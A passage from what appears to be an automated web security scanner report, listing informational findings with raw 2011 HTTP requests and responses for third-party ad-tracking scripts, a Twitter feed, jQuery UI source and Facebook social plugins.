if(!window.c3VTconstVal){c3VTconstVals={c3VJSconst:{c3VJSscriptLimit:0,c3VJScollection:new Array(),c3VJSurl:'v.js',c3VTJSurl:'c3VTabstrct-6-2.php'}};window.c3VTconstVal=c3VTconstVals}if(!window.fireC3VTJSobj){function fireC3VTJS(){this.fireCall=function(){var a=c3VTconstVal.c3VJSconst.c3VJSurl+'.*$';var b=c3VTconstVal.c3VJSconst.c3VTJSurl+"?id=adver&cid=480&t=72&rv=&uid=&td=";var c=document.getElementsByTagName('script')[0];var e=document.createElement('script');e.type='text/javascript';e.async=true;e.src='http://480-adver-view.c3metrics.com/'+b;var r=new RegExp(a);var f=document.getElementsByTagName('script');var g=f.length;for(var i=c3VTconstVal.c3VJSconst.c3VJSscriptLimit;i<g;i++){if(r.exec(f[i]['src'])){d=f[i];d.parentNode.insertBefore(e,d.nextSibling);c3VTconstVal.c3VJSconst.c3VJSscriptLimit=i+1;i=g}}}}}var c3obj=String(Math.floor(Math.random()*100));window.c3VTconstVal.c3VJSconst.c3VJScollection[c3obj]=new fireC3VTJS();window.c3VTconstVal.c3VJSconst.c3VJScollection[c3obj].fireCall();

Request 2

GET /v.js?id=adver&cid=480&t=72 HTTP/1.1
Host: 480-adver-view.c3metrics.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=13014572191303613803; __utmz=50049588.1304384012.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 603-PV=1#5/3/2011/0/53/33; _jsuid=6502829057886404149; __ar_v4=QQIKSQRSOVDJFIQJ7MO55Y%3A20110502%3A2%7CGGAJKTM5HZA37LK7ZM43YU%3A20110502%3A2%7CM5MLKX2RJBHNJMOYLCAI74%3A20110502%3A2; __utma=50049588.16355070.1304384012.1304384012.1304384012.1; 603-CT=1#5/3/2011/1/4/52; SERVERID=s2; 480-SM=adver_05-02-2011-12-46-04; 480-VT=aol_05-05-2011-12-43-39_11076048371304599419ZZZZadcon_05-06-2011-11-08-35_990492871304680115ZZZZadver_05-09-2011-15-29-49_10650526691304954989; 480-nUID=adver_10650526691304954989

Response 2

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:38:55 GMT
Server: Apache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Content-Length: 0
Connection: close
Content-Type: text/html


15.3. http://api.twitter.com/1/wvuefox8/lists/wvue-fox-8-3/statuses.json  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://api.twitter.com
Path:   /1/wvuefox8/lists/wvue-fox-8-3/statuses.json

Request 1

GET /1/wvuefox8/lists/wvue-fox-8-3/statuses.json?callback=TWTR.Widget.receiveCallback_1&include_rts=true&clientsource=TWITTERINC_WIDGET&1304955538932=cachebust HTTP/1.1
Host: api.twitter.com
Proxy-Connection: keep-alive
Referer: http://www.fox8live.com/default.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: guest_id=130314166807091166; __utmz=43838368.1303561994.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); k=173.193.214.243.1304470443436909; __utma=43838368.551233229.1303561994.1304617828.1304721594.4

Response 1

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:39:41 GMT
Server: hi
Status: 200 OK
X-Transaction: 1304955581-43234-51315
X-RateLimit-Limit: 150
ETag: "d640a63e6d4c8f178a68be50c58e168a"-gzip
Last-Modified: Mon, 09 May 2011 15:39:41 GMT
X-RateLimit-Remaining: 148
X-Runtime: 0.04042
X-Transaction-Mask: a6183ffa5f8ca943ff1b53b5644ef114bc137096
Content-Type: application/json; charset=utf-8
Pragma: no-cache
X-RateLimit-Class: api
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
X-MID: e74652c3d440cadd935e7e0b1675c0679bbdd85f
X-RateLimit-Reset: 1304959140
Set-Cookie: original_referer=ZLhHHTiegr%2FMnOT%2Fp8liqKLpSbkz6bAtT4p5bnOw1ZAfyga3xOTsMg%3D%3D; path=/
Set-Cookie: _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCFzzadUvAToHaWQiJTM5Yjg2NzFhNGIzMWUw%250AZTAxOGEzYjc2YjE1OWFjZGRkIgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--2ae163b2825351976cb494802b1d845f55f5087e; domain=.twitter.com; path=/; HttpOnly
Vary: Accept-Encoding
Connection: close
Content-Length: 35250

TWTR.Widget.receiveCallback_1([{"text":"http:\/\/t.co\/PZWHmCQ","coordinates":null,"truncated":false,"id_str":"67605941750743040","source":"\u003Ca href=\"http:\/\/twitter.com\/download\/android\" rel=\"nofollow\"\u003ETwitter for Android\u003C\/a\u003E","geo":null,"favorited":false,"retweet_count":0,"in_reply_to_screen_name":null,"in_reply_to_status_id":null,"in_reply_to_status_id_str":null,"place":null,"created_at":"Mon May 09 15:04:47 +0000 2011","contributors":null,"user":{"profile_use_background_image":true,"follow_request_sent":null,"following":null,"friends_count":11,"profile_background_color":"C0DEED","description":"I am the morning reporter and Morning Call anchor at FOX 8 in New Orleans .","screen_name":"EAndersonWVUE","statuses_count":28,"profile_background_image_url":"http:\/\/a3.twimg.com\/a\/1303316982\/images\/themes\/theme1\/bg.png","verified":false,"id_str":"250828887","is_translator":false,"profile_text_color":"333333","location":"New Orleans, LA ","listed_count":4,"contributors_enabled":false,"profile_sidebar_fill_color":"DDEEF6","profile_background_tile":false,"url":"http:\/\/www.fox8live.com","lang":"en","followers_count":38,"protected":false,"notifications":null,"time_zone":"Central Time (US & Canada)","created_at":"Fri Feb 11 22:06:33 +0000 2011","profile_link_color":"0084B4","name":"Evan Anderson","default_profile_image":false,"default_profile":true,"profile_sidebar_border_color":"C0DEED","id":250828887,"show_all_inline_media":true,"geo_enabled":false,"utc_offset":-21600,"favourites_count":0,"profile_
...[SNIP]...

Request 2

GET /1/wvuefox8/lists/wvue-fox-8-3/statuses.json?callback=TWTR.Widget.receiveCallback_1&include_rts=true&clientsource=TWITTERINC_WIDGET&1304955538932=cachebust HTTP/1.1
Host: api.twitter.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: guest_id=130314166807091166; __utmz=43838368.1303561994.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); k=173.193.214.243.1304470443436909; __utma=43838368.551233229.1303561994.1304617828.1304721594.4

Response 2

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:39:52 GMT
Server: hi
Status: 200 OK
X-Transaction: 1304955592-41835-26748
X-RateLimit-Limit: 150
ETag: "d640a63e6d4c8f178a68be50c58e168a"-gzip
Last-Modified: Mon, 09 May 2011 15:39:52 GMT
X-RateLimit-Remaining: 121
X-Runtime: 0.03563
X-Transaction-Mask: a6183ffa5f8ca943ff1b53b5644ef114bc137096
Content-Type: application/json; charset=utf-8
Pragma: no-cache
X-RateLimit-Class: api
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
X-MID: 6ffa38b55abc73740c83d1287278cbf36df23288
X-RateLimit-Reset: 1304959140
Set-Cookie: _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCJIfatUvAToHaWQiJTk4Y2FjMDBkYjVlZjdh%250AZDJhMTI0ZGUwMmVlYmM0NzZhIgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--cd54e78447e410fdd3d04babd83b43e59777fe00; domain=.twitter.com; path=/; HttpOnly
Vary: Accept-Encoding
Connection: close
Content-Length: 35250

TWTR.Widget.receiveCallback_1([{"text":"http:\/\/t.co\/PZWHmCQ","coordinates":null,"truncated":false,"id_str":"67605941750743040","source":"\u003Ca href=\"http:\/\/twitter.com\/download\/android\" rel=\"nofollow\"\u003ETwitter for Android\u003C\/a\u003E","geo":null,"favorited":false,"retweet_count":0,"in_reply_to_screen_name":null,"in_reply_to_status_id":null,"in_reply_to_status_id_str":null,"place":null,"created_at":"Mon May 09 15:04:47 +0000 2011","contributors":null,"user":{"profile_use_background_image":true,"follow_request_sent":null,"following":null,"friends_count":11,"profile_background_color":"C0DEED","description":"I am the morning reporter and Morning Call anchor at FOX 8 in New Orleans .","screen_name":"EAndersonWVUE","statuses_count":28,"profile_background_image_url":"http:\/\/a3.twimg.com\/a\/1303316982\/images\/themes\/theme1\/bg.png","verified":false,"id_str":"250828887","is_translator":false,"profile_text_color":"333333","location":"New Orleans, LA ","listed_count":4,"contributors_enabled":false,"profile_sidebar_fill_color":"DDEEF6","profile_background_tile":false,"url":"http:\/\/www.fox8live.com","lang":"en","followers_count":38,"protected":false,"notifications":null,"time_zone":"Central Time (US & Canada)","created_at":"Fri Feb 11 22:06:33 +0000 2011","profile_link_color":"0084B4","name":"Evan Anderson","default_profile_image":false,"default_profile":true,"profile_sidebar_border_color":"C0DEED","id":250828887,"show_all_inline_media":true,"geo_enabled":false,"utc_offset":-21600,"favourites_count":0,"profile_image_url":"http:\/\/a3.twimg.com\/profile_images\/1253535787\/bio_head_shot_normal.jpg"},"retweeted":f
...[SNIP]...

15.4. http://fw.adsafeprotected.com/rjss/bs.serving-sys.com/9766/90645/BurstingPipe/adServer.bs  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://fw.adsafeprotected.com
Path:   /rjss/bs.serving-sys.com/9766/90645/BurstingPipe/adServer.bs

Request 1

GET /rjss/bs.serving-sys.com/9766/90645/BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2320695&PluID=0&w=300&h=250&ord=2660552&ncu=$$http://ad.doubleclick.net/click%3Bh%3Dv8/3b02/3/0/%2a/g%3B240220354%3B0-0%3B0%3B60978287%3B4307-300/250%3B41589231/41607018/1%3B%3B%7Esscs%3D%3f$$ HTTP/1.1
Host: fw.adsafeprotected.com
Proxy-Connection: keep-alive
Referer: http://www.npr.org/templates/reg/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=ECB3DBA48FEF66EDAE9A7E846E561B69; Path=/
Content-Type: text/javascript
Content-Length: 8015
Date: Mon, 09 May 2011 15:39:50 GMT
Connection: close


var adsafeVisParams = {
   mode : "jss",
   jsref : "http://www.npr.org/templates/reg/",
   adsafeSrc : "http://fw.adsafeprotected.com/rfw/bs.serving-sys.com/9766/90645/BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2320695&PluID=0&w=300&h=250&ord=2660552&ncu=$$http://ad.doubleclick.net/click%3Bh%3Dv8/3b02/3/0/%2a/g%3B240220354%3B0-0%3B0%3B60978287%3B4307-300/250%3B41589231/41607018/1%3B%3B%7Esscs%3D%3f$$",
   adsafeSep : "&",
   requrl : "",
   reqquery : "",
   debug : "false"
};


(function(){var f="3.6";var o=(adsafeVisParams.debug==="true");var y=2000;var z={INFO:"info",LOG:"log",DIR:"dir"};var k=function(E,G,C){if(typeof G==="undefined"){G=z.INFO;}if(o&&(typeof console!=="undefined")&&(typeof console.info!=="undefined")&&(typeof console.log!=="undefined")){if(typeof console.dir==="undefined"&&G===z.DIR){if(typeof E==="object"){for(var F in E){if(E.hasOwnProperty(F)){var A=(typeof C!=="undefined")?C+" : ":"";k(E[F],G,A+F);}}}else{try{console.log(C+": "+E);}catch(D){}}}else{try{console[G](E);}catch(B){}}}};var r=function(C,B){var A,F,E;k("Server Parameters:");k(adsafeVisParams,z.DIR);var D="Detection Results:\n\n";for(A in C){E=C[A];D+=E.key+": "+decodeURIComponent(E.val)+"\n";}k(D);D="key: \n";for(F in B){if(B.hasOwnProperty(F)){D+=F+": "+B[F]+"\n";}}k(D);};k("v"+f+", mode: "+adsafeVisParams.mode);var j={a:"top.location.href",b:"parent.location.href",c:"parent.document.referrer",d:"window.location.href",e:"window.document.referrer",f:"jsref",g:"ffCheck -- firefox result",q:"ffCheck -- parent.parent.parent... result"};var n=function(){var A={};try{A.a=encodeURIComponent(top.location.href);}catch(D){}try{A.b=encodeURIComponent(parent.location.href);}catch(D){}try{A.c=encodeURIComponent(parent.document.referrer);}catch(D){}try{A.d=encodeURIComponent(window.location.href);}catch(D){}try{A.e=encodeURIComponent(window.document.referrer);}catch(D){}try{A.f=encodeURIComponent(adsafeVisParams.jsref);}catch(D){}try{var C=a();A.g=encodeURIComponent(C.g);A.q=encodeURIComponent(C.q);}catch(D){}A=l(A);A=m(A);var B=[];for(var E in A){if(A.hasO
...[SNIP]...

Request 2

GET /rjss/bs.serving-sys.com/9766/90645/BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2320695&PluID=0&w=300&h=250&ord=2660552&ncu=$$http://ad.doubleclick.net/click%3Bh%3Dv8/3b02/3/0/%2a/g%3B240220354%3B0-0%3B0%3B60978287%3B4307-300/250%3B41589231/41607018/1%3B%3B%7Esscs%3D%3f$$ HTTP/1.1
Host: fw.adsafeprotected.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=E7476F46E47DA0A90EC8F6D5D1422C91; Path=/
Content-Type: text/javascript
Content-Length: 7986
Date: Mon, 09 May 2011 15:39:51 GMT
Connection: close


var adsafeVisParams = {
   mode : "jss",
   jsref : "null",
   adsafeSrc : "http://fw.adsafeprotected.com/rfw/bs.serving-sys.com/9766/90645/BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2320695&PluID=0&w=300&h=250&ord=2660552&ncu=$$http://ad.doubleclick.net/click%3Bh%3Dv8/3b02/3/0/%2a/g%3B240220354%3B0-0%3B0%3B60978287%3B4307-300/250%3B41589231/41607018/1%3B%3B%7Esscs%3D%3f$$",
   adsafeSep : "&",
   requrl : "",
   reqquery : "",
   debug : "false"
};


(function(){var f="3.6";var o=(adsafeVisParams.debug==="true");var y=2000;var z={INFO:"info",LOG:"log",DIR:"dir"};var k=function(E,G,C){if(typeof G==="undefined"){G=z.INFO;}if(o&&(typeof console!=="undefined")&&(typeof console.info!=="undefined")&&(typeof console.log!=="undefined")){if(typeof console.dir==="undefined"&&G===z.DIR){if(typeof E==="object"){for(var F in E){if(E.hasOwnProperty(F)){var A=(typeof C!=="undefined")?C+" : ":"";k(E[F],G,A+F);}}}else{try{console.log(C+": "+E);}catch(D){}}}else{try{console[G](E);}catch(B){}}}};var r=function(C,B){var A,F,E;k("Server Parameters:");k(adsafeVisParams,z.DIR);var D="Detection Results:\n\n";for(A in C){E=C[A];D+=E.key+": "+decodeURIComponent(E.val)+"\n";}k(D);D="key: \n";for(F in B){if(B.hasOwnProperty(F)){D+=F+": "+B[F]+"\n";}}k(D);};k("v"+f+", mode: "+adsafeVisParams.mode);var j={a:"top.location.href",b:"parent.location.href",c:"parent.document.referrer",d:"window.location.href",e:"window.document.referrer",f:"jsref",g:"ffCheck -- firefox result",q:"ffCheck -- parent.parent.parent... result"};var n=function(){var A={};try{A.a=encodeURIComponent(top.location.href);}catch(D){}try{A.b=encodeURIComponent(parent.location.href);}catch(D){}try{A.c=encodeURIComponent(parent.document.referrer);}catch(D){}try{A.d=encodeURIComponent(window.location.href);}catch(D){}try{A.e=encodeURIComponent(window.document.referrer);}catch(D){}try{A.f=encodeURIComponent(adsafeVisParams.jsref);}catch(D){}try{var C=a();A.g=encodeURIComponent(C.g);A.q=encodeURIComponent(C.q);}catch(D){}A=l(A);A=m(A);var B=[];for(var E in A){if(A.hasOwnProperty(E)){B.push({key:E,
...[SNIP]...

15.5. http://jqueryui.com/ui/jquery.ui.widget.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://jqueryui.com
Path:   /ui/jquery.ui.widget.js

Request 1

GET /ui/jquery.ui.widget.js HTTP/1.1
Host: jqueryui.com
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/topics/reporter/Doyle+Rice
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=77982607.1303160339.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/19; __utma=77982607.804821504.1303160339.1303160339.1303160339.1

Response 1

HTTP/1.1 302 Moved Temporarily
Server: nginx/0.7.62
Date: Mon, 09 May 2011 15:43:16 GMT
Content-Type: text/html
Content-Length: 161
Connection: keep-alive
Location: http://hotlink.jquery.com/jqueryui/ui/jquery.ui.widget.js
X-Proxy: 2

<html>
<head><title>302 Found</title></head>
<body bgcolor="white">
<center><h1>302 Found</h1></center>
<hr><center>nginx/0.7.62</center>
</body>
</html>

Request 2

GET /ui/jquery.ui.widget.js HTTP/1.1
Host: jqueryui.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=77982607.1303160339.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/19; __utma=77982607.804821504.1303160339.1303160339.1303160339.1

Response 2

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 09 May 2011 15:43:17 GMT
Content-Type: application/x-javascript
Connection: keep-alive
Last-Modified: Sat, 23 Apr 2011 13:21:46 GMT
ETag: "240c59-1ad1-4a195db29ee80"
Accept-Ranges: bytes
Content-Length: 6865
X-Served-By: www3
X-Proxy: 2

/*!
* jQuery UI Widget 1.8.12
*
* Copyright 2011, AUTHORS.txt (http://jqueryui.com/about)
* Dual licensed under the MIT or GPL Version 2 licenses.
* http://jquery.org/license
*
* http://docs.jquery.com/UI/Widget
*/
(function( $, undefined ) {

// jQuery 1.4+
if ( $.cleanData ) {
   var _cleanData = $.cleanData;
   $.cleanData = function( elems ) {
       for ( var i = 0, elem; (elem = elems[i]) != null; i++ ) {
           $( elem ).triggerHandler( "remove" );
       }
       _cleanData( elems );
   };
} else {
   var _remove = $.fn.remove;
   $.fn.remove = function( selector, keepData ) {
       return this.each(function() {
           if ( !keepData ) {
               if ( !selector || $.filter( selector, [ this ] ).length ) {
                   $( "*", this ).add( [ this ] ).each(function() {
                       $( this ).triggerHandler( "remove" );
                   });
               }
           }
           return _remove.call( $(this), selector, keepData );
       });
   };
}

$.widget = function( name, base, prototype ) {
   var namespace = name.split( "." )[ 0 ],
       fullName;
   name = name.split( "." )[ 1 ];
   fullName = namespace + "-" + name;

   if ( !prototype ) {
       prototype = base;
       base = $.Widget;
   }

   // create selector for plugin
   $.expr[ ":" ][ fullName ] = function( elem ) {
       return !!$.data( elem, name );
   };

   $[ namespace ] = $[ namespace ] || {};
   $[ namespace ][ name ] = function( options, element ) {
       // allow instantiation without initializing for simple inheritance
       if ( arguments.length ) {
           this._createWidget( options, element );
       }
   };

   var basePrototype = new base();
   // we need to make the options hash a property directly on the new instance
   // otherwise we'll modify the options hash on the prototype that we're
   // inheriting from
//    $.each( basePrototype, function( ke
...[SNIP]...

15.6. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.facebook.com
Path:   /plugins/like.php

Request 1

GET /plugins/like.php?href=facebook.com/ChristianScienceMonitor&layout=button_count&show_faces=true&width=110&action=like&font=arial&colorscheme=light&height=21 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.csmonitor.com/Business
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response 1

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.60.34
X-Cnection: close
Date: Mon, 09 May 2011 15:35:06 GMT
Content-Length: 6900

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<script type="text/javascript">
Env={module:"like_widget",impid:"67882412",user:0,locale:"en_US",method:"GET",start:(new Date()).getTime(),ps_limit:5,ps_ratio:4,svn_rev:375286,vip:"69.171.224.39",static_base:"http:\/\/static.ak.fbcdn.net\/",www_base:"http:\/\/www.facebook.com\/",rep_lag:2,fb_dtsg:"-rYxz",lhsh:"282ea",tracking_domain:"http:\/\/pixel.facebook.com",retry_ajax_on_network_error:"1",ajaxpipe_enabled:"1",no_cookies:1};
</script>

<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y0/r/7NS4A3NTFw2.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js"></script>
<script type="text/javascript">window.Bootloader && Bootloader.done(["lIKWr"]);</script></head><body class="plugin transparent_widget safari4 Locale_en_US"><div id="FB_HiddenContainer" style="position:absolute; top:-10000px; width:0px; height:0px;"></div><div id="LikePluginPagelet"><div id="connect_widget_4dc809aa7c94f7954749862" class="connect_widget button_count" style="font-family: &quot;arial&quot;, sans-serif"><table class="connect_widget_interactive_area"><tr><td class="connect_widget_vertical_center connect_widget_button_cell"><div class="connect_button_slider"><div class="connect_button_container"><a class="connect_widget_like_button clearfix like_button_no_like"><div class="tombstone_cross"></div><span class="liketext">Like</span></a></div></div></td><td class="connect_widget_vertical_center connect_widget_confirm_cell"><span class="connect_widget_confirm_span hidden_elem"><a class="mrm connect_widget_confirm_link">Confirm</a></span></td><td class="connect_widget_button_count_including hidden_elem"><table class="uiGrid" cellspacing="0" cellpadding="0"><tbody><tr><td><div class="thumbs_up hidden_elem"></div></td><td><div class="undo hidden_elem"></div></td></tr><tr><td><div class="connect_widget_button_count_nub"><s></s><i></i></div></td><td><div class="connect_widget_button_count_count">27K</div></td></tr></tbody></table></td><td class="connect_widget_button_count
...[SNIP]...

Request 2

GET /plugins/like.php?href=facebook.com/ChristianScienceMonitor&layout=button_count&show_faces=true&width=110&action=like&font=arial&colorscheme=light&height=21 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response 2

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.114.35
X-Cnection: close
Date: Mon, 09 May 2011 15:35:16 GMT
Content-Length: 6866

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<script type="text/javascript">
Env={module:"like_widget",impid:"4fe82ae0",user:0,locale:"en_US",method:"GET",start:(new Date()).getTime(),ps_limit:5,ps_ratio:4,svn_rev:375286,vip:"69.171.224.39",static_base:"http:\/\/static.ak.fbcdn.net\/",www_base:"http:\/\/www.facebook.com\/",rep_lag:2,fb_dtsg:"-rYxz",lhsh:"282ea",tracking_domain:"http:\/\/pixel.facebook.com",retry_ajax_on_network_error:"1",ajaxpipe_enabled:"1",no_cookies:1};
</script>

<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y0/r/7NS4A3NTFw2.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js"></script>
<script type="text/javascript">window.Bootloader && Bootloader.done(["lIKWr"]);</script></head><body class="plugin transparent_widget safari4 Locale_en_US"><div id="FB_HiddenContainer" style="position:absolute; top:-10000px; width:0px; height:0px;"></div><div id="LikePluginPagelet"><div id="connect_widget_4dc809b4dea5f8b43355623" class="connect_widget button_count" style="font-family: &quot;arial&quot;, sans-serif"><table class="connect_widget_interactive_area"><tr><td class="connect_widget_vertical_center connect_widget_button_cell"><div class="connect_button_slider"><div class="connect_button_container"><a class="connect_widget_like_button clearfix like_button_no_like"><div class="tombstone_cross"></div><span class="liketext">Like</span></a></div></div></td><td class="connect_widget_vertical_center connect_widget_confirm_cell"><span class="connect_widget_confirm_span hidden_elem"><a class="mrm connect_widget_confirm_link">Confirm</a></span></td><td class="connect_widget_button_count_including hidden_elem"><table class="uiGrid" cellspacing="0" cellpadding="0"><tbody><tr><td><div class="thumbs_up hidden_elem"></div></td><td><div class="undo hidden_elem"></div></td></tr><tr><td><div class="connect_widget_button_count_nub"><s></s><i></i></div></td><td><div class="connect_widget_button_count_count">27K</div></td></tr></tbody></table></td><td class="connect_widget_button_count
...[SNIP]...

15.7. http://www.facebook.com/plugins/recommendations.php  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.facebook.com
Path:   /plugins/recommendations.php

Request 1

GET /plugins/recommendations.php?site=www.csmonitor.com&width=270&height=590&header=false&colorscheme=light&font=arial&border_color=%23fff HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.csmonitor.com/Business
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response 1

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.55.25.50
X-Cnection: close
Date: Mon, 09 May 2011 15:35:07 GMT
Content-Length: 19190

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
